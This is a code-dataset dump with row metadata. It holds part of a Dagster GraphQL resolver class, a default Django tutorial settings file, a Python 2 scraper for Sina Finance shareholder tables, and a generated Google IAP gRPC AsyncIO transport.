)
executionPlanOrError = graphene.Field(
graphene.NonNull(GrapheneExecutionPlanOrError),
args={
"pipeline": graphene.Argument(graphene.NonNull(GraphenePipelineSelector)),
"runConfigData": graphene.Argument(GrapheneRunConfigData),
"mode": graphene.Argument(graphene.NonNull(graphene.String)),
},
)
runConfigSchemaOrError = graphene.Field(
graphene.NonNull(GrapheneRunConfigSchemaOrError),
args={
"selector": graphene.Argument(graphene.NonNull(GraphenePipelineSelector)),
"mode": graphene.Argument(graphene.String),
},
description="""Fetch an environment schema given an execution selection and a mode.
        See the description on RunConfigSchema for more information.""",
)
instance = graphene.NonNull(GrapheneInstance)
assetsOrError = graphene.Field(
graphene.NonNull(GrapheneAssetsOrError),
prefix=graphene.List(graphene.NonNull(graphene.String)),
cursor=graphene.String(),
limit=graphene.Int(),
)
assetOrError = graphene.Field(
graphene.NonNull(GrapheneAssetOrError),
assetKey=graphene.Argument(graphene.NonNull(GrapheneAssetKeyInput)),
)
assetNodes = graphene.Field(
non_null_list(GrapheneAssetNode),
pipeline=graphene.Argument(GraphenePipelineSelector),
assetKeys=graphene.Argument(graphene.List(graphene.NonNull(GrapheneAssetKeyInput))),
loadMaterializations=graphene.Boolean(default_value=False),
)
assetNodeOrError = graphene.Field(
graphene.NonNull(GrapheneAssetNodeOrError),
assetKey=graphene.Argument(graphene.NonNull(GrapheneAssetKeyInput)),
)
partitionBackfillOrError = graphene.Field(
graphene.NonNull(GraphenePartitionBackfillOrError),
backfillId=graphene.Argument(graphene.NonNull(graphene.String)),
)
partitionBackfillsOrError = graphene.Field(
graphene.NonNull(GraphenePartitionBackfillsOrError),
status=graphene.Argument(GrapheneBulkActionStatus),
cursor=graphene.String(),
limit=graphene.Int(),
)
permissions = graphene.Field(non_null_list(GraphenePermission))
def resolve_repositoriesOrError(self, graphene_info):
return fetch_repositories(graphene_info)
def resolve_repositoryOrError(self, graphene_info, **kwargs):
return fetch_repository(
graphene_info,
RepositorySelector.from_graphql_input(kwargs.get("repositorySelector")),
)
def resolve_workspaceOrError(self, graphene_info):
return fetch_workspace(graphene_info.context)
def resolve_pipelineSnapshotOrError(self, graphene_info, **kwargs):
snapshot_id_arg = kwargs.get("snapshotId")
pipeline_selector_arg = kwargs.get("activePipelineSelector")
check.invariant(
not (snapshot_id_arg and pipeline_selector_arg),
"Must only pass one of snapshotId or activePipelineSelector",
)
check.invariant(
snapshot_id_arg or pipeline_selector_arg,
"Must set one of snapshotId or activePipelineSelector",
)
if pipeline_selector_arg:
pipeline_selector = pipeline_selector_from_graphql(kwargs["activePipelineSelector"])
return get_pipeline_snapshot_or_error_from_pipeline_selector(
graphene_info, pipeline_selector
)
else:
return get_pipeline_snapshot_or_error_from_snapshot_id(graphene_info, snapshot_id_arg)
def resolve_graphOrError(self, graphene_info, **kwargs):
graph_selector = graph_selector_from_graphql(kwargs["selector"])
return get_graph_or_error(graphene_info, graph_selector)
def resolve_version(self, graphene_info):
return graphene_info.context.version
def resolve_scheduler(self, graphene_info):
return get_scheduler_or_error(graphene_info)
def resolve_scheduleOrError(self, graphene_info, schedule_selector):
return get_schedule_or_error(
graphene_info, ScheduleSelector.from_graphql_input(schedule_selector)
)
def resolve_schedulesOrError(self, graphene_info, **kwargs):
return get_schedules_or_error(
graphene_info,
RepositorySelector.from_graphql_input(kwargs.get("repositorySelector")),
)
def resolve_sensorOrError(self, graphene_info, sensorSelector):
return get_sensor_or_error(graphene_info, SensorSelector.from_graphql_input(sensorSelector))
def resolve_sensorsOrError(self, graphene_info, **kwargs):
return get_sensors_or_error(
graphene_info,
RepositorySelector.from_graphql_input(kwargs.get("repositorySelector")),
)
def resolve_instigationStateOrError(self, graphene_info, instigationSelector):
return get_job_state_or_error(
graphene_info, InstigationSelector.from_graphql_input(instigationSelector)
)
def resolve_unloadableInstigationStatesOrError(self, graphene_info, **kwargs):
job_type = (
InstigatorType(kwargs["instigationType"]) if "instigationType" in kwargs else None
)
return get_unloadable_job_states_or_error(graphene_info, job_type)
def resolve_pipelineOrError(self, graphene_info, **kwargs):
return get_pipeline_or_error(
graphene_info,
pipeline_selector_from_graphql(kwargs["params"]),
)
def resolve_pipelineRunsOrError(self, _graphene_info, **kwargs):
filters = kwargs.get("filter")
if filters is not None:
filters = filters.to_selector()
return GrapheneRuns(
filters=filters,
cursor=kwargs.get("cursor"),
limit=kwargs.get("limit"),
)
def resolve_pipelineRunOrError(self, graphene_info, runId):
return get_run_by_id(graphene_info, runId)
def resolve_runsOrError(self, _graphene_info, **kwargs):
filters = kwargs.get("filter")
if filters is not None:
filters = filters.to_selector()
return GrapheneRuns(
filters=filters,
cursor=kwargs.get("cursor"),
limit=kwargs.get("limit"),
)
def resolve_runOrError(self, graphene_info, runId):
return get_run_by_id(graphene_info, runId)
def resolve_runGroupsOrError(self, graphene_info, **kwargs):
filters = kwargs.get("filter")
if filters is not None:
filters = filters.to_selector()
return GrapheneRunGroupsOrError(
results=get_run_groups(
graphene_info, filters, kwargs.get("cursor"), kwargs.get("limit")
)
)
def resolve_partitionSetsOrError(self, graphene_info, **kwargs):
return get_partition_sets_or_error(
graphene_info,
RepositorySelector.from_graphql_input(kwargs.get("repositorySelector")),
kwargs.get("pipelineName"),
)
def resolve_partitionSetOrError(self, graphene_info, **kwargs):
return get_partition_set(
graphene_info,
RepositorySelector.from_graphql_input(kwargs.get("repositorySelector")),
kwargs.get("partitionSetName"),
)
def resolve_pipelineRunTags(self, graphene_info):
return get_run_tags(graphene_info)
def resolve_runGroupOrError(self, graphene_info, runId):
return get_run_group(graphene_info, runId)
def resolve_isPipelineConfigValid(self, graphene_info, pipeline, **kwargs):
return validate_pipeline_config(
graphene_info,
pipeline_selector_from_graphql(pipeline),
parse_run_config_input(kwargs.get("runConfigData", {})),
kwargs.get("mode"),
)
def resolve_executionPlanOrError(self, graphene_info, pipeline, **kwargs):
return get_execution_plan(
graphene_info,
pipeline_selector_from_graphql(pipeline),
parse_run_config_input(kwargs.get("runConfigData", {})),
kwargs.get("mode"),
)
def resolve_runConfigSchemaOrError(self, graphene_info, **kwargs):
return resolve_run_config_schema_or_error(
graphene_info,
pipeline_selector_from_graphql(kwargs["selector"]),
kwargs.get("mode"),
)
def resolve_instance(self, graphene_info):
return GrapheneInstance(graphene_info.context.instance)
def resolve_assetNodes(self, graphene_info, **kwargs):
asset_keys = set(
AssetKey.from_graphql_input(asset_key) for asset_key in kwargs.get("assetKeys", [])
)
if "pipeline" in kwargs:
pipeline_name = kwargs.get("pipeline").get("pipelineName")
repo_sel = RepositorySelector.from_graphql_input(kwargs.get("pipeline"))
repo_loc = graphene_info.context.get_repository_location(repo_sel.location_name)
repo = repo_loc.get_repository(repo_sel.repository_name)
external_asset_nodes = repo.get_external_asset_nodes(pipeline_name)
results = (
[GrapheneAssetNode(repo, asset_node) for asset_node in external_asset_nodes]
if external_asset_nodes
else []
)
else:
results = get_asset_nodes(graphene_info)
results = [node for node in results if not asset_keys or node.assetKey in asset_keys]
if not results:
return []
materialization_loader = BatchMaterializationLoader(
instance=graphene_info.context.instance, asset_keys=[node.assetKey for node in results]
)
return [
GrapheneAssetNode(
node.get_external_repository(),
node.get_external_asset_node(),
materialization_loader=materialization_loader,
)
for node in results
]
def resolve_assetNodeOrError(self, graphene_info, **kwargs):
return get_asset_node(graphene_info, AssetKey.from_graphql_input(kwargs["assetKey"]))
def resolve_assetsOrError(self, graphene_info, **kwargs):
return get_assets(
graphene_info,
prefix=kwargs.get("prefix"),
cursor=kwargs.get("cursor"),
limit=kwargs.get("limit"),
)
def resolve_assetOrError(self, graphene_info, **kwargs):
return get_asset(graphene_info, AssetKey.from_graphql_input(kwargs["assetKey"]))
def resolve_partitionBackfillOrError(self, graphene_info, backfillId):
return get_backfill(graphene_info, backfillId)
def resolve_partitionBackfillsOrError(self, graphene_info, **kwargs):
status = kwargs.get("status")
return get_backfills(
graphene_info,
status=BulkActionStatus.from_graphql_input(status) if status else None,
cursor=kwargs.get("cursor"),
limit=kwargs.get("limit"),
)
def resolve_permissions(self, graphene_info):
permissions = graphene_info.context.permissions
return [GraphenePermission(permission, value) for permission, value in permissions.items()]
| true | true |
1c4a6b7f9a2cd7b57e29cb5f2d14e1917bfc20b7 | 3,448 | py | Python | tutorial/settings.py | cyndi088/tutorial | 4a1e373554b827fce1719fe49e1e49412eaa7af5 | [
"MIT"
] | null | null | null | tutorial/settings.py | cyndi088/tutorial | 4a1e373554b827fce1719fe49e1e49412eaa7af5 | [
"MIT"
] | 2 | 2020-01-09T07:58:53.000Z | 2020-02-12T14:57:46.000Z | tutorial/settings.py | cyndi088/tutorial | 4a1e373554b827fce1719fe49e1e49412eaa7af5 | [
"MIT"
] | null | null | null | """
Django settings for tutorial project.
Generated by 'django-admin startproject' using Django 2.2.7.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
import sys
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.insert(0, os.path.join(BASE_DIR, 'tutorial'))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '5nrnq$kj)nxh9@u-v#n83(9d4@x1r-vk%+%_5)!6$1smwy2-y&'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'tutorial.snippets',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'tutorial.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'tutorial.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# LOGIN_REDIRECT_URL = '/admin'  # page to redirect to after a successful login
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
# LANGUAGE_CODE = 'zh-Hans'
# TIME_ZONE = 'UTC'
TIME_ZONE = 'Asia/Shanghai'
USE_I18N = True
USE_L10N = True
USE_TZ = False
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
# Pagination
REST_FRAMEWORK = {
'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
'PAGE_SIZE': 10
} | 25.540741 | 91 | 0.697506 |
import os
import sys
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.insert(0, os.path.join(BASE_DIR, 'tutorial'))
SECRET_KEY = '5nrnq$kj)nxh9@u-v#n83(9d4@x1r-vk%+%_5)!6$1smwy2-y&'
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'tutorial.snippets',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'tutorial.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'tutorial.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# LOGIN_REDIRECT_URL = '/admin'  # page to redirect to after a successful login
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
# LANGUAGE_CODE = 'zh-Hans'
# TIME_ZONE = 'UTC'
TIME_ZONE = 'Asia/Shanghai'
USE_I18N = True
USE_L10N = True
USE_TZ = False
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
# Pagination
REST_FRAMEWORK = {
'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
'PAGE_SIZE': 10
} | true | true |
1c4a6d7a93c31fd531179e05b0100a24784018f5 | 1,342 | py | Python | gudong/dumpData.py | happy6666/stockStrategies | 01ac608d1f69a7318d168036e8e6f77aa95c649c | [
"Apache-2.0"
] | null | null | null | gudong/dumpData.py | happy6666/stockStrategies | 01ac608d1f69a7318d168036e8e6f77aa95c649c | [
"Apache-2.0"
] | 1 | 2019-11-04T07:56:09.000Z | 2019-11-04T07:56:09.000Z | gudong/dumpData.py | happy6666/stockStrategies | 01ac608d1f69a7318d168036e8e6f77aa95c649c | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
# coding: utf-8
import sys
import time
import urllib2
from bs4 import BeautifulSoup
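# Sina Finance "top ten shareholders" page for a given stock code (gb18030-encoded)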
req='http://vip.stock.finance.sina.com.cn/corp/go.php/vCI_StockHolder/stockid/%s/displaytype/30.phtml'
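# u'\u622a\u81f3\u65e5\u671f' is the table header "截至日期" ("as-of date"); '1'..'10' are shareholder ranks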
desired=set([u'\u622a\u81f3\u65e5\u671f','1','2','3','4','5','6','7','8','9','10'])
def parseData(code):
global req
url=req%code
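	# fetch inside the retry loop below: a urllib2 response can only be read
	# once, so it must be re-opened on every attempt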
	t=3
	while True:
		time.sleep(t)
		rep=urllib2.urlopen(url)
		data=rep.read()
soup=BeautifulSoup(data,from_encoding='gb18030')
if soup.find(id='Table1') is not None:
break
else:
t+=60
trs=soup.find(id='Table1').tbody.find_all('tr')
final=[]
res=[]
for tr in trs:
if tr.td.get_text()==u'\u622a\u81f3\u65e5\u671f':
if len(res)>0:
t=res[0]
final.append('\n'.join([code+'\001'+l+'\001'+t for l in res[1:]]))
res=[]
if tr.td.get_text().strip() in desired and len(tr.find_all('td'))>1:
res.append(tr.find_all('td')[1].get_text().strip())
if len(res)>0:
t=res[0]
final.append('\n'.join([code+'\001'+l+'\001'+t for l in res[1:]]))
return '\n'.join(final)
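# parseData() emits one record per shareholder:
#   "<stock code>\001<shareholder name>\001<as-of date>"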
if __name__=='__main__':
f=file(sys.argv[1])
output=file(sys.argv[2],'w')
while True:
line=f.readline()
if len(line)==0:
break
print line.strip()
sys.stdout.flush()
forout=parseData(line.strip()).encode('utf8')
if len(forout)>0:
output.write(forout+'\n')
output.flush()
output.close()
| 24.851852 | 103 | 0.64307 | import sys
import time
import urllib2
from bs4 import BeautifulSoup
req='http://vip.stock.finance.sina.com.cn/corp/go.php/vCI_StockHolder/stockid/%s/displaytype/30.phtml'
desired=set([u'\u622a\u81f3\u65e5\u671f','1','2','3','4','5','6','7','8','9','10'])
def parseData(code):
global req
url=req%code
	t=3
	while True:
		time.sleep(t)
		rep=urllib2.urlopen(url)
		data=rep.read()
soup=BeautifulSoup(data,from_encoding='gb18030')
if soup.find(id='Table1') is not None:
break
else:
t+=60
trs=soup.find(id='Table1').tbody.find_all('tr')
final=[]
res=[]
for tr in trs:
if tr.td.get_text()==u'\u622a\u81f3\u65e5\u671f':
if len(res)>0:
t=res[0]
final.append('\n'.join([code+'\001'+l+'\001'+t for l in res[1:]]))
res=[]
if tr.td.get_text().strip() in desired and len(tr.find_all('td'))>1:
res.append(tr.find_all('td')[1].get_text().strip())
if len(res)>0:
t=res[0]
final.append('\n'.join([code+'\001'+l+'\001'+t for l in res[1:]]))
return '\n'.join(final)
if __name__=='__main__':
f=file(sys.argv[1])
output=file(sys.argv[2],'w')
while True:
line=f.readline()
if len(line)==0:
break
print line.strip()
sys.stdout.flush()
forout=parseData(line.strip()).encode('utf8')
if len(forout)>0:
output.write(forout+'\n')
output.flush()
output.close()
| false | true |
1c4a6d92ab4a6582c87d304e6fe65c32e55535a7 | 17,478 | py | Python | google/cloud/iap/v1/iap-v1-py/google/cloud/iap_v1/services/identity_aware_proxy_admin_service/transports/grpc_asyncio.py | googleapis/googleapis-gen | d84824c78563d59b0e58d5664bfaa430e9ad7e7a | [
"Apache-2.0"
] | 7 | 2021-02-21T10:39:41.000Z | 2021-12-07T07:31:28.000Z | google/cloud/iap/v1/iap-v1-py/google/cloud/iap_v1/services/identity_aware_proxy_admin_service/transports/grpc_asyncio.py | googleapis/googleapis-gen | d84824c78563d59b0e58d5664bfaa430e9ad7e7a | [
"Apache-2.0"
] | 6 | 2021-02-02T23:46:11.000Z | 2021-11-15T01:46:02.000Z | google/cloud/iap/v1/iap-v1-py/google/cloud/iap_v1/services/identity_aware_proxy_admin_service/transports/grpc_asyncio.py | googleapis/googleapis-gen | d84824c78563d59b0e58d5664bfaa430e9ad7e7a | [
"Apache-2.0"
] | 4 | 2021-01-28T23:25:45.000Z | 2021-08-30T01:55:16.000Z | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Awaitable, Callable, Dict, Optional, Sequence, Tuple, Union
from google.api_core import gapic_v1 # type: ignore
from google.api_core import grpc_helpers_async # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
import packaging.version
import grpc # type: ignore
from grpc.experimental import aio # type: ignore
from google.cloud.iap_v1.types import service
from google.iam.v1 import iam_policy_pb2 # type: ignore
from google.iam.v1 import policy_pb2 # type: ignore
from .base import IdentityAwareProxyAdminServiceTransport, DEFAULT_CLIENT_INFO
from .grpc import IdentityAwareProxyAdminServiceGrpcTransport
class IdentityAwareProxyAdminServiceGrpcAsyncIOTransport(IdentityAwareProxyAdminServiceTransport):
"""gRPC AsyncIO backend transport for IdentityAwareProxyAdminService.
APIs for Identity-Aware Proxy Admin configurations.
This class defines the same methods as the primary client, so the
primary client can load the underlying transport implementation
and call it.
It sends protocol buffers over the wire using gRPC (which is built on
top of HTTP/2); the ``grpcio`` package must be installed.
"""
_grpc_channel: aio.Channel
_stubs: Dict[str, Callable] = {}
@classmethod
def create_channel(cls,
host: str = 'iap.googleapis.com',
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
**kwargs) -> aio.Channel:
"""Create and return a gRPC AsyncIO channel object.
Args:
host (Optional[str]): The host for the channel to use.
credentials (Optional[~.Credentials]): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If
none are specified, the client will attempt to ascertain
the credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
            scopes (Optional[Sequence[str]]): An optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
kwargs (Optional[dict]): Keyword arguments, which are passed to the
channel creation.
Returns:
aio.Channel: A gRPC AsyncIO channel object.
"""
return grpc_helpers_async.create_channel(
host,
credentials=credentials,
credentials_file=credentials_file,
quota_project_id=quota_project_id,
default_scopes=cls.AUTH_SCOPES,
scopes=scopes,
default_host=cls.DEFAULT_HOST,
**kwargs
)
def __init__(self, *,
host: str = 'iap.googleapis.com',
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
channel: aio.Channel = None,
api_mtls_endpoint: str = None,
client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
ssl_channel_credentials: grpc.ChannelCredentials = None,
client_cert_source_for_mtls: Callable[[], Tuple[bytes, bytes]] = None,
quota_project_id=None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
always_use_jwt_access: Optional[bool] = False,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is ignored if ``channel`` is provided.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
            scopes (Optional[Sequence[str]]): An optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
channel (Optional[aio.Channel]): A ``Channel`` instance through
which to make calls.
api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
If provided, it overrides the ``host`` argument and tries to create
a mutual TLS channel with client SSL credentials from
``client_cert_source`` or application default SSL credentials.
client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
Deprecated. A callback to provide client SSL certificate bytes and
private key bytes, both in PEM format. It is ignored if
``api_mtls_endpoint`` is None.
ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
for the grpc channel. It is ignored if ``channel`` is provided.
client_cert_source_for_mtls (Optional[Callable[[], Tuple[bytes, bytes]]]):
A callback to provide client certificate bytes and private key bytes,
both in PEM format. It is used to configure a mutual TLS channel. It is
ignored if ``channel`` or ``ssl_channel_credentials`` is provided.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
always_use_jwt_access (Optional[bool]): Whether self signed JWT should
be used for service account credentials.
Raises:
google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport
creation failed for any reason.
google.api_core.exceptions.DuplicateCredentialArgs: If both ``credentials``
and ``credentials_file`` are passed.
"""
self._grpc_channel = None
self._ssl_channel_credentials = ssl_channel_credentials
self._stubs: Dict[str, Callable] = {}
if api_mtls_endpoint:
warnings.warn("api_mtls_endpoint is deprecated", DeprecationWarning)
if client_cert_source:
warnings.warn("client_cert_source is deprecated", DeprecationWarning)
if channel:
# Ignore credentials if a channel was passed.
credentials = False
# If a channel was explicitly provided, set it.
self._grpc_channel = channel
self._ssl_channel_credentials = None
else:
if api_mtls_endpoint:
host = api_mtls_endpoint
# Create SSL credentials with client_cert_source or application
# default SSL credentials.
if client_cert_source:
cert, key = client_cert_source()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
else:
self._ssl_channel_credentials = SslCredentials().ssl_credentials
else:
if client_cert_source_for_mtls and not ssl_channel_credentials:
cert, key = client_cert_source_for_mtls()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
# The base transport sets the host, credentials and scopes
super().__init__(
host=host,
credentials=credentials,
credentials_file=credentials_file,
scopes=scopes,
quota_project_id=quota_project_id,
client_info=client_info,
always_use_jwt_access=always_use_jwt_access,
)
if not self._grpc_channel:
self._grpc_channel = type(self).create_channel(
self._host,
credentials=self._credentials,
credentials_file=credentials_file,
scopes=self._scopes,
ssl_credentials=self._ssl_channel_credentials,
quota_project_id=quota_project_id,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
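            # the -1 option values above disable gRPC's default message size
            # limits (notably the 4 MiB receive cap)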
# Wrap messages. This must be done after self._grpc_channel exists
self._prep_wrapped_messages(client_info)
@property
def grpc_channel(self) -> aio.Channel:
"""Create the channel designed to connect to this service.
This property caches on the instance; repeated calls return
the same channel.
"""
# Return the channel from cache.
return self._grpc_channel
@property
def set_iam_policy(self) -> Callable[
[iam_policy_pb2.SetIamPolicyRequest],
Awaitable[policy_pb2.Policy]]:
r"""Return a callable for the set iam policy method over gRPC.
Sets the access control policy for an Identity-Aware Proxy
protected resource. Replaces any existing policy. More
information about managing access via IAP can be found at:
https://cloud.google.com/iap/docs/managing-access#managing_access_via_the_api
Returns:
Callable[[~.SetIamPolicyRequest],
Awaitable[~.Policy]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'set_iam_policy' not in self._stubs:
self._stubs['set_iam_policy'] = self.grpc_channel.unary_unary(
'/google.cloud.iap.v1.IdentityAwareProxyAdminService/SetIamPolicy',
request_serializer=iam_policy_pb2.SetIamPolicyRequest.SerializeToString,
response_deserializer=policy_pb2.Policy.FromString,
)
return self._stubs['set_iam_policy']
@property
def get_iam_policy(self) -> Callable[
[iam_policy_pb2.GetIamPolicyRequest],
Awaitable[policy_pb2.Policy]]:
r"""Return a callable for the get iam policy method over gRPC.
Gets the access control policy for an Identity-Aware Proxy
protected resource. More information about managing access via
IAP can be found at:
https://cloud.google.com/iap/docs/managing-access#managing_access_via_the_api
Returns:
Callable[[~.GetIamPolicyRequest],
Awaitable[~.Policy]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'get_iam_policy' not in self._stubs:
self._stubs['get_iam_policy'] = self.grpc_channel.unary_unary(
'/google.cloud.iap.v1.IdentityAwareProxyAdminService/GetIamPolicy',
request_serializer=iam_policy_pb2.GetIamPolicyRequest.SerializeToString,
response_deserializer=policy_pb2.Policy.FromString,
)
return self._stubs['get_iam_policy']
@property
def test_iam_permissions(self) -> Callable[
[iam_policy_pb2.TestIamPermissionsRequest],
Awaitable[iam_policy_pb2.TestIamPermissionsResponse]]:
r"""Return a callable for the test iam permissions method over gRPC.
Returns permissions that a caller has on the Identity-Aware
Proxy protected resource. More information about managing access
via IAP can be found at:
https://cloud.google.com/iap/docs/managing-access#managing_access_via_the_api
Returns:
Callable[[~.TestIamPermissionsRequest],
Awaitable[~.TestIamPermissionsResponse]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'test_iam_permissions' not in self._stubs:
self._stubs['test_iam_permissions'] = self.grpc_channel.unary_unary(
'/google.cloud.iap.v1.IdentityAwareProxyAdminService/TestIamPermissions',
request_serializer=iam_policy_pb2.TestIamPermissionsRequest.SerializeToString,
response_deserializer=iam_policy_pb2.TestIamPermissionsResponse.FromString,
)
return self._stubs['test_iam_permissions']
@property
def get_iap_settings(self) -> Callable[
[service.GetIapSettingsRequest],
Awaitable[service.IapSettings]]:
r"""Return a callable for the get iap settings method over gRPC.
Gets the IAP settings on a particular IAP protected
resource.
Returns:
Callable[[~.GetIapSettingsRequest],
Awaitable[~.IapSettings]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'get_iap_settings' not in self._stubs:
self._stubs['get_iap_settings'] = self.grpc_channel.unary_unary(
'/google.cloud.iap.v1.IdentityAwareProxyAdminService/GetIapSettings',
request_serializer=service.GetIapSettingsRequest.serialize,
response_deserializer=service.IapSettings.deserialize,
)
return self._stubs['get_iap_settings']
@property
def update_iap_settings(self) -> Callable[
[service.UpdateIapSettingsRequest],
Awaitable[service.IapSettings]]:
r"""Return a callable for the update iap settings method over gRPC.
Updates the IAP settings on a particular IAP protected resource.
It replaces all fields unless the ``update_mask`` is set.
Returns:
Callable[[~.UpdateIapSettingsRequest],
Awaitable[~.IapSettings]]:
A function that, when called, will call the underlying RPC
on the server.
"""
